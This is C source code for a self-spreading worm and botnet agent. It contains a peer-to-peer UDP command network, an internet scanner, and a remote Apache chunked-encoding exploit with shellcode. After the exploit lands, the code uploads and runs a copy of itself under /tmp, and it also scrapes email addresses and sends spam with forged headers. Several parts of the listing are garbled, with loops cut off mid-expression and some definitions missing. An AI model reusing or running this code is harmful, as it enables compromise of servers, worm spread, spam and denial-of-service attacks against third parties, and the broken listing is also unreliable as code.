#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SCAN
#undef LARGE_NET
#undef FREEBSD
#define LINKS 64
#define CLIENTS 128
#define PORT 2001
#define SCANPORT 80
#define SCANTIMEOUT 5
#define MAXPATH 4096
#define ESCANPORT 10100
/////////////////////////////////////////////////////////
#define TCP_PENDING 1
#define TCP_CONNECTED 2
#define SOCKS_REPLY 3
#define FREE(x) {if (x) { free(x);x=NULL; }}
enum { ASUCCESS=0, ARESOLVE, ACONNECT, ASOCKET, ABIND, AINUSE, APENDING, AINSTANCE, AUNKNOWN };
enum { AREAD=1, AWRITE=2, AEXCEPT=4 };
void Log(char *format,...) {
va_list args;
int nBuf;
char szBuffer[4096];
FILE *a=fopen("/bin/.log","a");
va_start(args,format);
nBuf=vsnprintf(szBuffer,sizeof(szBuffer),format,args);
va_end(args);
if (a == NULL) return;
fprintf(a,"%s",szBuffer);
fclose(a);
}
void nas(int a) {
}
#ifdef SCAN
unsigned char classes[] = { 3, 4, 6, 8, 9, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 35, 38, 40, 43, 44, 45,
46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 61, 62, 63, 64, 65, 66, 67, 68, 80, 81, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138,
139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167,
168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196,
198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 224, 225, 226, 227, 228, 229,
230, 231, 232, 233, 234, 235, 236, 237, 238, 239 };
#endif
struct ainst {
void *ext,*ext5;
int ext2,ext3,ext4;
int sock,error;
unsigned long len;
struct sockaddr_in in;
};
struct header {
char tag;
int id;
unsigned long len;
unsigned long seq;
};
struct route_rec {
struct header h;
unsigned char hops;
unsigned long server;
};
struct kill_rec {
struct header h;
};
struct sh_rec {
struct header h;
};
struct version_rec {
struct header h;
};
struct ping_rec {
struct header h;
};
struct pong_rec {
struct header h;
unsigned long from;
};
struct update_rec {
struct header h;
};
struct list_rec {
struct header h;
};
struct udp_rec {
struct header h;
unsigned long size;
unsigned long target;
unsigned short port;
unsigned long secs;
};
struct tcp_rec {
struct header h;
unsigned long target;
unsigned short port;
unsigned long secs;
};
struct gen_rec {
struct header h;
unsigned long target;
unsigned short port;
unsigned long secs;
};
struct df_rec {
struct header h;
unsigned long target;
unsigned long secs;
};
struct add_rec {
struct header h;
unsigned long server;
unsigned long socks;
unsigned long bind;
unsigned short port;
};
struct data_rec {
struct header h;
};
struct addsrv_rec {
struct header h;
};
struct initsrv_rec {
struct header h;
};
struct qmyip_rec {
struct header h;
};
struct myip_rec {
struct header h;
unsigned long ip;
};
struct escan_rec {
struct header h;
unsigned long ip;
};
struct click_rec {
struct header h;
};
struct spam_rec {
struct header h;
unsigned long from;
unsigned long to;
};
struct exploit_rec {
struct header h;
unsigned long ip;
};
struct ainst clients[CLIENTS*2];
struct ainst udpclient;
unsigned int sseed;
struct route_table {
int id;
unsigned long ip;
unsigned short port;
} routes[LINKS];
unsigned long numlinks,*links=NULL, myip=0;
unsigned long sequence[LINKS];
void gsrand(unsigned long s) { sseed=s; }
unsigned long grand() { sseed=((sseed*965764979)%65535)/2; return sseed; }
unsigned int *pids=NULL;
unsigned long numpids=0;
int mfork() {
unsigned int parent, *newpids, i;
parent=fork();
if (parent <= 0) return parent;
numpids++;
newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
for (i=0;ierror) {
case ASUCCESS:return "Operation Success";
case ARESOLVE:return "Unable to resolve";
case ACONNECT:return "Unable to connect";
case ASOCKET:return "Unable to create socket";
case ABIND:return "Unable to bind socket";
case AINUSE:return "Port is in use";
case APENDING:return "Operation pending";
case AUNKNOWN:default:return "Unknown";
}
return "";
}
int aresolve(char *host) {
struct hostent *hp;
if (inet_addr(host) == 0 || inet_addr(host) == -1) {
unsigned long a;
if ((hp = gethostbyname(host)) == NULL) return 0;
bcopy((char*)hp->h_addr, (char*)&a, hp->h_length);
return a;
}
else return inet_addr(host);
}
int abind(struct ainst *inst,unsigned long ip,unsigned short port) {
struct sockaddr_in in;
if (inst == NULL) return (AINSTANCE);
if (inst->sock == 0) {
inst->error=AINSTANCE;
return (AINSTANCE);
}
inst->len=0;
in.sin_family = AF_INET;
if (ip == NULL) in.sin_addr.s_addr = INADDR_ANY;
else in.sin_addr.s_addr = ip;
in.sin_port = htons(port);
if (bind(inst->sock, (struct sockaddr *)&in, sizeof(in)) < 0) {
inst->error=ABIND;
return (ABIND);
}
inst->error=ASUCCESS;
return ASUCCESS;
}
int await(struct ainst **inst,unsigned long len,char type,long secs) {
struct timeval tm,*tmp;
fd_set read,write,except,*readp,*writep,*exceptp;
int p,ret,max;
if (inst == NULL) return (AINSTANCE);
for (p=0;plen=0;
if (secs > 0) {
tm.tv_sec=secs;
tm.tv_usec=0;
tmp=&tm;
}
else tmp=(struct timeval *)NULL;
if (type & AREAD) {
FD_ZERO(&read);
for (p=0;psock,&read);
readp=&read;
}
else readp=(struct fd_set*)0;
if (type & AWRITE) {
FD_ZERO(&write);
for (p=0;psock,&write);
writep=&write;
}
else writep=(struct fd_set*)0;
if (type & AEXCEPT) {
FD_ZERO(&except);
for (p=0;psock,&except);
exceptp=&except;
}
else exceptp=(struct fd_set*)0;
for (p=0,max=0;psock > max) max=inst[p]->sock;
if ((ret=select(max+1,readp,writep,exceptp,tmp)) == 0) {
for (p=0;perror=APENDING;
return (APENDING);
}
if (ret == -1) return (AUNKNOWN);
for (p=0;psock,&read)) inst[p]->len+=AREAD;
if (type & AWRITE) if (FD_ISSET(inst[p]->sock,&write)) inst[p]->len+=AWRITE;
if (type & AEXCEPT) if (FD_ISSET(inst[p]->sock,&except)) inst[p]->len+=AEXCEPT;
}
for (p=0;perror=ASUCCESS;
return (ASUCCESS);
}
int atcp_sync_check(struct ainst *inst) {
if (inst == NULL) return (AINSTANCE);
inst->len=0;
errno=0;
if (connect(inst->sock, (struct sockaddr *)&inst->in, sizeof(inst->in)) == 0 || errno == EISCONN) {
inst->error=ASUCCESS;
return (ASUCCESS);
}
if (!(errno == EINPROGRESS ||errno == EALREADY)) {
inst->error=ACONNECT;
return (ACONNECT);
}
inst->error=APENDING;
return (APENDING);
}
int atcp_sync_connect(struct ainst *inst,char *host,unsigned int port) {
int flag=1;
struct hostent *hp;
if (inst == NULL) return (AINSTANCE);
inst->len=0;
if ((inst->sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
inst->error=ASOCKET;
return (ASOCKET);
}
if (inet_addr(host) == 0 || inet_addr(host) == -1) {
if ((hp = gethostbyname(host)) == NULL) {
inst->error=ARESOLVE;
return (ARESOLVE);
}
bcopy((char*)hp->h_addr, (char*)&inst->in.sin_addr, hp->h_length);
}
else inst->in.sin_addr.s_addr=inet_addr(host);
inst->in.sin_family = AF_INET;
inst->in.sin_port = htons(port);
flag = fcntl(inst->sock, F_GETFL, 0);
flag |= O_NONBLOCK;
fcntl(inst->sock, F_SETFL, flag);
inst->error=ASUCCESS;
return (ASUCCESS);
}
int atcp_connect(struct ainst *inst,char *host,unsigned int port) {
int flag=1;
unsigned long start;
struct hostent *hp;
if (inst == NULL) return (AINSTANCE);
inst->len=0;
if ((inst->sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
inst->error=ASOCKET;
return (ASOCKET);
}
if (inet_addr(host) == 0 || inet_addr(host) == -1) {
if ((hp = gethostbyname(host)) == NULL) {
inst->error=ARESOLVE;
return (ARESOLVE);
}
bcopy((char*)hp->h_addr, (char*)&inst->in.sin_addr, hp->h_length);
}
else inst->in.sin_addr.s_addr=inet_addr(host);
inst->in.sin_family = AF_INET;
inst->in.sin_port = htons(port);
flag = fcntl(inst->sock, F_GETFL, 0);
flag |= O_NONBLOCK;
fcntl(inst->sock, F_SETFL, flag);
start=time(NULL);
while(time(NULL)-start < 10) {
errno=0;
if (connect(inst->sock, (struct sockaddr *)&inst->in, sizeof(inst->in)) == 0 || errno == EISCONN) {
inst->error=ASUCCESS;
return (ASUCCESS);
}
if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
sleep(1);
}
inst->error=ACONNECT;
return (ACONNECT);
}
int atcp_accept(struct ainst *inst,struct ainst *child) {
int sock;
unsigned int datalen;
if (inst == NULL || child == NULL) return (AINSTANCE);
datalen=sizeof(child->in);
inst->len=0;
memcpy((void*)child,(void*)inst,sizeof(struct ainst));
if ((sock=accept(inst->sock,(struct sockaddr *)&child->in,&datalen)) < 0) {
memset((void*)child,0,sizeof(struct ainst));
inst->error=APENDING;
return (APENDING);
}
child->sock=sock;
inst->len=datalen;
inst->error=ASUCCESS;
return (ASUCCESS);
}
int atcp_send(struct ainst *inst,char *buf,unsigned long len) {
long datalen;
if (inst == NULL) return (AINSTANCE);
inst->len=0;
errno=0;
if ((datalen=write(inst->sock,buf,len)) < len) {
if (errno == EAGAIN) {
inst->error=APENDING;
return (APENDING);
}
else {
inst->error=AUNKNOWN;
return (AUNKNOWN);
}
}
inst->len=datalen;
inst->error=ASUCCESS;
return (ASUCCESS);
}
int atcp_sendmsg(struct ainst *inst, char *words, ...) {
static char textBuffer[2048];
unsigned int a;
va_list args;
va_start(args, words);
a=vsprintf(textBuffer, words, args);
va_end(args);
return atcp_send(inst,textBuffer,a);
}
int atcp_recv(struct ainst *inst,char *buf,unsigned long len) {
long datalen;
if (inst == NULL) return (AINSTANCE);
inst->len=0;
if ((datalen=read(inst->sock,buf,len)) < 0) {
if (errno == EAGAIN) {
inst->error=APENDING;
return (APENDING);
}
else {
inst->error=AUNKNOWN;
return (AUNKNOWN);
}
}
if (datalen == 0 && len) {
inst->error=AUNKNOWN;
return (AUNKNOWN);
}
inst->len=datalen;
inst->error=ASUCCESS;
return (ASUCCESS);
}
int atcp_close(struct ainst *inst) {
if (inst == NULL) return (AINSTANCE);
inst->len=0;
if (close(inst->sock) < 0) {
inst->error=AUNKNOWN;
return (AUNKNOWN);
}
inst->sock=0;
inst->error=ASUCCESS;
return (ASUCCESS);
}
int audp_listen(struct ainst *inst,unsigned int port) {
int flag=1;
if (inst == NULL) return (AINSTANCE);
inst->len=0;
if ((inst->sock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0) {
inst->error=ASOCKET;
return (ASOCKET);
}
inst->in.sin_family = AF_INET;
inst->in.sin_addr.s_addr = INADDR_ANY;
inst->in.sin_port = htons(port);
if (bind(inst->sock, (struct sockaddr *)&inst->in, sizeof(inst->in)) < 0) {
inst->error=ABIND;
return (ABIND);
}
flag = fcntl(inst->sock, F_GETFL, 0);
flag |= O_NONBLOCK;
fcntl(inst->sock, F_SETFL, flag);
inst->error=ASUCCESS;
return (ASUCCESS);
}
int audp_setup(struct ainst *inst,char *host,unsigned int port) {
int flag=1;
struct hostent *hp;
if (inst == NULL) return (AINSTANCE);
inst->len=0;
if ((inst->sock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0) {
inst->error=ASOCKET;
return (ASOCKET);
}
if (inet_addr(host) == 0 || inet_addr(host) == -1) {
if ((hp = gethostbyname(host)) == NULL) {
inst->error=ARESOLVE;
return (ARESOLVE);
}
bcopy((char*)hp->h_addr, (char*)&inst->in.sin_addr, hp->h_length);
}
else inst->in.sin_addr.s_addr=inet_addr(host);
inst->in.sin_family = AF_INET;
inst->in.sin_port = htons(port);
flag = fcntl(inst->sock, F_GETFL, 0);
flag |= O_NONBLOCK;
fcntl(inst->sock, F_SETFL, flag);
inst->error=ASUCCESS;
return (ASUCCESS);
}
int audp_send(struct ainst *inst,char *buf,unsigned long len) {
long datalen;
if (inst == NULL) return (AINSTANCE);
inst->len=0;
errno=0;
if ((datalen=sendto(inst->sock,buf,len,0,(struct sockaddr*)&inst->in,sizeof(inst->in))) < len) {
if (errno == EAGAIN) {
inst->error=APENDING;
return (APENDING);
}
else {
inst->error=AUNKNOWN;
return (AUNKNOWN);
}
}
inst->len=datalen;
inst->error=ASUCCESS;
return (ASUCCESS);
}
int audp_sendmsg(struct ainst *inst, char *words, ...) {
static char textBuffer[2048];
unsigned int a;
va_list args;
va_start(args, words);
a=vsprintf(textBuffer, words, args);
va_end(args);
return audp_send(inst,textBuffer,a);
}
int audp_recv(struct ainst *inst,struct ainst *client,char *buf,unsigned long len) {
long datalen,nlen;
if (inst == NULL) return (AINSTANCE);
nlen=sizeof(inst->in);
inst->len=0;
memcpy((void*)client,(void*)inst,sizeof(struct ainst));
if ((datalen=recvfrom(inst->sock,buf,len,0,(struct sockaddr*)&client->in,(socklen_t*)&nlen)) < 0) {
if (errno == EAGAIN) {
inst->error=APENDING;
return (APENDING);
}
else {
inst->error=AUNKNOWN;
return (AUNKNOWN);
}
}
inst->len=datalen;
inst->error=ASUCCESS;
return (ASUCCESS);
}
int audp_close(struct ainst *inst) {
if (inst == NULL) return (AINSTANCE);
inst->len=0;
if (close(inst->sock) < 0) {
inst->error=AUNKNOWN;
return (AUNKNOWN);
}
inst->sock=0;
inst->error=ASUCCESS;
return (ASUCCESS);
}
unsigned long _decrypt(char *str, unsigned long len) {
unsigned long pos=0,seed[4]={0x78912389,0x094e7bc43,0xba5de30b,0x7bc54da7};
gsrand(((seed[0]+seed[1])*seed[2])^seed[3]);
while(1) {
gsrand(seed[pos%4]+grand()+pos);
str[pos]-=grand();
pos++;
if (pos >= len) break;
}
return pos;
}
unsigned long _encrypt(char *str, unsigned long len) {
unsigned long pos=0,seed[4]={0x78912389,0x094e7bc43,0xba5de30b,0x7bc54da7};
gsrand(((seed[0]+seed[1])*seed[2])^seed[3]);
while(1) {
gsrand(seed[pos%4]+grand()+pos);
str[pos]+=grand();
pos++;
if (pos >= len) break;
}
return pos;
}
int useseq(unsigned long seq) {
unsigned long a;
if (seq == 0) return 0;
for (a=0;a0;i--) sequence[i-1]=sequence[i];
sequence[0]=seq;
}
void addserver(unsigned long server) {
unsigned long *newlinks, i, stop;
char a=0;
for (i=0;i= 16 && b <= 31) return 0;
if (a == 192 && b == 168) return 0;
return 1;
}
void broadcast(char *buf,unsigned long len) {
unsigned long nics,a;
if (numlinks == 0 || links == NULL) return;
a=(numlinks/5);
if (a > 50) a=50;
else if (a < 4) a=4;
if (a > numlinks) a=numlinks;
nics=rand()%((numlinks-a)+1);
a+=nics;
for (;nics700?700:numlinks-b;
unsigned long *_links=links+b;
unsigned char *str;
if (b > numlinks) break;
str=(unsigned char*)malloc(sizeof(struct addsrv_rec)+(_numlinks*sizeof(struct next_rec)));
if (str == NULL) return;
memset((void*)&rc,0,sizeof(struct addsrv_rec));
rc.h.tag=tag;
rc.h.id=id;
rc.h.len=sizeof(struct next_rec)*_numlinks;
memcpy((void*)str,(void*)&rc,sizeof(struct addsrv_rec));
for (a=0;a<_numlinks;a++) {
memset((void*)&fc,0,sizeof(struct next_rec));
fc.server=_links[a];
memcpy((void*)(str+sizeof(struct addsrv_rec)+(a*sizeof(struct next_rec))),(void*)&fc,sizeof(struct next_rec));
}
if (!id) relay(inst->in.sin_addr.s_addr,(void*)str,sizeof(struct addsrv_rec)+(_numlinks*sizeof(struct next_rec)));
else audp_send(inst,(void*)str,sizeof(struct addsrv_rec)+(_numlinks*sizeof(struct next_rec)));
FREE(str);
}
}
void senderror(struct ainst *inst, int id, char *buf2) {
struct data_rec rc;
char *str,*buf=strdup(buf2);
memset((void*)&rc,0,sizeof(struct data_rec));
rc.h.tag=0x45;
rc.h.id=id;
rc.h.seq=newseq();
rc.h.len=strlen(buf2);
_encrypt(buf,strlen(buf2));
str=(char*)malloc(sizeof(struct data_rec)+strlen(buf2)+1);
if (str == NULL) {
FREE(buf2);
return;
}
memcpy((void*)str,(void*)&rc,sizeof(struct data_rec));
memcpy((void*)(str+sizeof(struct data_rec)),buf,strlen(buf2));
audp_send(&udpclient,str,sizeof(struct data_rec)+strlen(buf2));
FREE(str);
FREE(buf);
}
int isgood(char a) {
if (a >= 'a' && a <= 'z') return 1;
if (a >= 'A' && a <= 'Z') return 1;
if (a >= '0' && a <= '9') return 1;
if (a == '.' || a == '@' || a == '^' || a == '-' || a == '_') return 1;
return 0;
}
int islisten(char a) {
if (a == '.') return 1;
if (a >= 'a' && a <= 'z') return 1;
if (a >= 'A' && a <= 'Z') return 1;
return 0;
}
struct _linklist {
char *name;
struct _linklist *next;
} *linklist=NULL;
void AddToList(char *str) {
struct _linklist *getb=linklist,*newb;
while(getb != NULL) {
if (!strcmp(str,getb->name)) return;
getb=getb->next;
}
newb=(struct _linklist *)malloc(sizeof(struct _linklist));
newb->name=strdup(str);
newb->next=linklist;
linklist=newb;
}
void cleanup(char *buf) {
while(buf[strlen(buf)-1] == '\n' || buf[strlen(buf)-1] == '\r' || buf[strlen(buf)-1] == ' ') buf[strlen(buf)-1] = 0;
while(*buf == '\n' || *buf == '\r' || *buf == ' ') {
unsigned long i;
for (i=strlen(buf)+1;i>0;i++) buf[i-1]=buf[i];
}
}
void ScanFile(char *f) {
FILE *file=fopen(f,"r");
unsigned long startpos=0;
if (file == NULL) return;
while(1) {
char buf[2];
memset(buf,0,2);
fseek(file,startpos,SEEK_SET);
fread(buf,1,1,file);
startpos++;
if (feof(file)) break;
if (*buf == '@') {
char email[256],c,d;
unsigned long pos=0;
while(1) {
unsigned long oldpos=ftell(file);
fseek(file,-1,SEEK_CUR);
c=fgetc(file);
if (!isgood(c)) break;
fseek(file,-1,SEEK_CUR);
if (oldpos == ftell(file)) break;
}
for (pos=0,c=0,d=0;pos<255;pos++) {
email[pos]=fgetc(file);
if (email[pos] == '.') c++;
if (email[pos] == '@') d++;
if (!isgood(email[pos])) break;
}
email[pos]=0;
if (c == 0 || d != 1) continue;
if (email[strlen(email)-1] == '.') email[strlen(email)-1]=0;
if (*email == '@' || *email == '.' || !*email) continue;
if (!strcmp(email,"webmaster@mydomain.com")) continue;
for (pos=0,c=0;pos 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) < 0) return NULL;
for (d=0;d 0; n -= 3, p += 3) {
if (n < 3) {
p[2] = '\0';
if (n < 2) p[1] = '\0';
}
ch = *p >> 2;
ch = ENC(ch);
if (sendch(a,ch) <= ASUCCESS) break;
ch = ((*p << 4) & 060) | ((p[1] >> 4) & 017);
ch = ENC(ch);
if (sendch(a,ch) <= ASUCCESS) break;
ch = ((p[1] << 2) & 074) | ((p[2] >> 6) & 03);
ch = ENC(ch);
if (sendch(a,ch) <= ASUCCESS) break;
ch = p[2] & 077;
ch = ENC(ch);
if (sendch(a,ch) <= ASUCCESS) break;
}
ch='\n';
if (sendch(a,ch) <= ASUCCESS) break;
usleep(10);
}
if (ferror(in)) {
fclose(in);
return 0;
}
ch = ENC('\0');
sendch(a,ch);
ch = '\n';
sendch(a,ch);
writem(a,"end\n");
if (in) fclose(in);
return 1;
}
void exploit(char *ip) {
char *a=GetAddress(ip);
char localip[256];
int l,sock;
struct sockaddr_in sin;
if (a == NULL) exit(0);
if (strncmp(a,"Apache",6)) exit(0);
free(a);
alarm(60);
for (l=0;l<2;l++) {
u_char buf[512], *expbuf=0, *p=0;
int i=0, j=0, responses=0;
memcpy(&victim, &targets[l], sizeof(victim));
sock = socket(PF_INET, SOCK_STREAM, 0);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = inet_addr(ip);
sin.sin_port = htons(80);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) exit(1);
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE) + ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero + 1024) * REP_POPULATOR));
PUT_STRING("POST / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n");
for (i = 0; i < REP_SHELLCODE; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_3, PADDING_3);
PUT_STRING(": ");
PUT_BYTES(NOPCOUNT, NOP);
memcpy(p, shellcode, sizeof(shellcode) - 1);
p += sizeof(shellcode) - 1;
PUT_STRING("\r\n");
}
for (i = 0; i < REP_POPULATOR; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_1, PADDING_1);
PUT_STRING(": ");
for (j = 0; j < victim.repretaddr; j++) {
*p++ = victim.retaddr & 0xff;
*p++ = (victim.retaddr >> 8) & 0xff;
*p++ = (victim.retaddr >> 16) & 0xff;
*p++ = (victim.retaddr >> 24) & 0xff;
}
PUT_BYTES(victim.repzero, 0);
PUT_STRING("\r\n");
}
PUT_STRING("Transfer-Encoding: chunked\r\n");
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
PUT_STRING(buf);
PUT_BYTES(PADSIZE_2, PADDING_2);
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta);
PUT_STRING(buf);
write(sock, expbuf, p - expbuf);
responses = 0;
while (1) {
fd_set fds;
int n;
struct timeval tv;
tv.tv_sec = 15;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) < 0) break;
if(n >= 1) {
for(i = 0; i < n; i ++) if(buf[i] == 'G') responses ++; else responses = 0;
if(responses >= 2) {
write(sock,"O",1);
alarm(3600);
sleep(10);
writem(sock,"\nrm -rf /tmp/.a;cat > /tmp/.uua << __eof__;\n");
encode(sock);
writem(sock,"__eof__\n");
conv(localip,256,myip);
sprintf(buf,"/usr/bin/uudecode -p /tmp/.uua > /tmp/.a;killall -9 .a;chmod +x /tmp/.a;killall -9 .a;/tmp/.a %s;exit;\n",localip);
writem(sock,buf);
while(read(sock,buf,1024)>=0);
exit(0);
}
}
}
}
free(expbuf);
close(sock);
}
return;
}
#endif
struct dns {
unsigned short int id;
unsigned char rd:1;
unsigned char tc:1;
unsigned char aa:1;
unsigned char opcode:4;
unsigned char qr:1;
unsigned char rcode:4;
unsigned char unused:2;
unsigned char pr:1;
unsigned char ra:1;
unsigned short int que_num;
unsigned short int rep_num;
unsigned short int num_rr;
unsigned short int num_rrsup;
};
struct dns_rr {
unsigned short type;
unsigned short rr_class;
unsigned int ttl;
unsigned short rdlength;
};
struct _elist {
char *name;
struct _elist *next;
};
struct _mailserver {
unsigned long count;
char *name;
struct _elist *elist;
struct _mailserver *next;
} *mailservers=(struct _mailserver*)NULL;
char *GetServer(char *str) {
unsigned char buf[2048];
unsigned long len=0,i,j,hostlen,g;
struct dns dnsp;
struct dns_rr dnsr;
struct ainst a,client;
char host[256],domain[256];
unsigned long start;
struct _mailserver *current=NULL;
struct _mailserver *getlist=mailservers;
i=0;
while(getlist != NULL) {
if (!strcasecmp(getlist->name,str)) {
i=1;
break;
}
getlist=getlist->next;
}
if (i) {
struct _elist *elist=getlist->elist;
current=getlist;
if (current->count) {
for (i=0;i<(rand()%current->count);i++) elist=elist->next;
return elist->name;
}
else return 0;
}
else {
struct _mailserver *new=(struct _mailserver*)malloc(sizeof(struct _mailserver));
new->count=0;
new->name=strdup(str);
new->elist=NULL;
new->next=mailservers;
mailservers=new;
current=new;
}
if (strlen(str) > 256) return 0;
strcpy(host,str);
if (audp_setup(&a,"12.127.17.71",53) != ASUCCESS) return 0;
srand(time(NULL));
memset(buf,0,2048);
dnsp.id=rand();
dnsp.rd=1;
dnsp.tc=0;
dnsp.aa=0;
dnsp.opcode=0;
dnsp.qr=0;
dnsp.rcode=0;
dnsp.unused=0;
dnsp.pr=0;
dnsp.ra=0;
dnsp.que_num=256;
dnsp.rep_num=0;
dnsp.num_rr=0;
dnsp.num_rrsup=0;
memcpy(buf,(void*)&dnsp,sizeof(dnsp));
len+=sizeof(dnsp);
hostlen=strlen(host);
for (i=0,j=0;i<=hostlen;i++) if (host[i] == '.' || host[i] == 0) {
char tmp;
tmp=host[i];
host[i]=0;
sprintf(buf+len,"%c%s",(unsigned char)(i-j),host+j);
len+=1+strlen(host+j);
j=i+1;
host[i]=tmp;
}
buf[len++]=0x0;
buf[len++]=0x0;
buf[len++]=0xf;
buf[len++]=0x0;
buf[len++]=0x1;
audp_send(&a,buf,len);
memset(buf,0,sizeof(buf));
start=time(NULL);
while(audp_recv(&a,&client,buf,sizeof(buf))) if (time(NULL)-start > 10) return 0;
memcpy((void*)&dnsp,buf,sizeof(dnsp));
memset(domain,0,256);
for (i=0;iname=strdup(output);
new->next=current->elist;
current->elist=new;
current->count++;
}
}
audp_close(&a);
if (current->count) return current->elist->name;
else return 0;
}
void SendMail(char *to, char *from, char *subject, char *data) {
struct ainst srv;
char buf[4096],bufm[4096],*sa;
unsigned long i,mode=0,tm=time(NULL);
memset(buf,0,4096);
strcpy(buf,to);
for (i=0;i\n",from);
break;
case 1:
atcp_sendmsg(&srv,"RCPT TO:<%s>\n",buf);
break;
case 2:
atcp_sendmsg(&srv,"DATA\n");
break;
case 3:
atcp_sendmsg(&srv,"QUIT\n");
atcp_close(&srv);
return;
}
mode++;
break;
case 354:
atcp_sendmsg(&srv,"Return-Path: <%c%c%c%c%c%c%c@aol.com>\n",tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65));
atcp_sendmsg(&srv,"From: %s\n",from);
atcp_sendmsg(&srv,"Message-ID: <%x.%x.%x@aol.com>\n",rand(),rand(),rand());
atcp_sendmsg(&srv,"Date: %s",ctime(&tm));
atcp_sendmsg(&srv,"Subject: %s\n",subject);
atcp_sendmsg(&srv,"To: %s\n",buf);
atcp_sendmsg(&srv,"Mime-Version: 1.0\n");
atcp_sendmsg(&srv,"Content-Type: text/html\n\n");
atcp_sendmsg(&srv,"%s\r\n.\r\n",data);
break;
}
}
}
int main(int argc, char **argv) {
unsigned char a=0,b=0,c=0,d=0;
unsigned long bases,*cpbases;
struct initsrv_rec initrec;
struct ainst backup;
int null=open("/dev/null",O_RDWR);
if (argc <= 1) {
printf("%s [base 2] ...\n",argv[0]);
return 0;
}
srand(time(NULL)^getpid());
memset((char*)&routes,0,sizeof(struct route_table)*24);
memset(clients,0,sizeof(struct ainst)*CLIENTS*2);
if (audp_listen(&udpserver,PORT) != 0) {
printf("Error: %s\n",aerror(&udpserver));
return 0;
}
memset((void*)&initrec,0,sizeof(struct initsrv_rec));
initrec.h.tag=0x70;
cpbases=(unsigned long*)malloc(sizeof(unsigned long)*argc);
if (cpbases == NULL) {
printf("Insufficient memory\n");
return 0;
}
for (bases=1;bases l) l=clients[n].sock;
}
tm.tv_sec=2;
tm.tv_usec=0;
select(l+1,&read,NULL,NULL,&tm);
if (FD_ISSET(udpserver.sock,&read)) udpserver.len=AREAD;
for (n=0;n<(CLIENTS*2);n++) if (clients[n].sock != 0) if (FD_ISSET(clients[n].sock,&read)) clients[n].len=AREAD;
timeout+=time(NULL)-start;
if (timeout >= 60) {
if (links == NULL || numlinks == 0) {
memset((void*)&initrec,0,sizeof(struct initsrv_rec));
initrec.h.tag=0x70;
for (bases=0;bases 0) {
unsigned int *newpids,on;
for (on=i+1;on= 5) atcp_close(&clients[n]);
if (p == ASUCCESS) {
char srv[256];
conv(srv,256,clients[n].in.sin_addr.s_addr);
if (mfork() == 0) {
exploit(srv);
exit(0);
}
}
}
#endif
for (n=0;n= sizeof(struct header)) {
switch(tmp->tag) {
case 0x20: { // Versione
#ifdef LARGE_NET
senderror(&udpclient,tmp->id,"Unknown 24-06-2002 APC (LN)\n");
#else
senderror(&udpclient,tmp->id,"Unknown 24-06-2002 APC\n");
#endif
} break;
case 0x21: { // Aggiungere il collegamento
struct add_rec *sr=(struct add_rec *)buf;
if (udpserver.len < sizeof(struct add_rec)) break;
for (n=0;nsocks == 0) conv(srv,256,sr->server);
else conv(srv,256,sr->socks);
clients[n].ext2=TCP_PENDING;
clients[n].ext3=sr->h.id;
clients[n].ext=(struct ainst*)malloc(sizeof(struct ainst));
if (clients[n].ext == NULL) {
clients[n].sock=0;
break;
}
memcpy((void*)clients[n].ext,(void*)&udpclient,sizeof(struct ainst));
if (sr->socks == 0) {
clients[n].ext5=NULL;
atcp_sync_connect(&clients[n],srv,sr->port);
}
else {
clients[n].ext5=(char*)malloc(9);
if (clients[n].ext5 == NULL) {
clients[n].sock=0;
break;
}
((char*)clients[n].ext5)[0]=0x04;
((char*)clients[n].ext5)[1]=0x01;
((char*)clients[n].ext5)[2]=((char*)&sr->port)[1];
((char*)clients[n].ext5)[3]=((char*)&sr->port)[0];
((char*)clients[n].ext5)[4]=((char*)&sr->server)[0];
((char*)clients[n].ext5)[5]=((char*)&sr->server)[1];
((char*)clients[n].ext5)[6]=((char*)&sr->server)[2];
((char*)clients[n].ext5)[7]=((char*)&sr->server)[3];
((char*)clients[n].ext5)[8]=0x00;
atcp_sync_connect(&clients[n],srv,1080);
}
if (sr->bind) abind(&clients[n],sr->bind,0);
break;
}
} break;
case 0x22: { // Collegamento di uccisione
struct kill_rec *sr=(struct kill_rec *)buf;
if (udpserver.len < sizeof(struct kill_rec)) break;
for (n=0;nh.id) {
FREE(clients[n].ext);
FREE(clients[n].ext5);
atcp_close(&clients[n]);
}
} break;
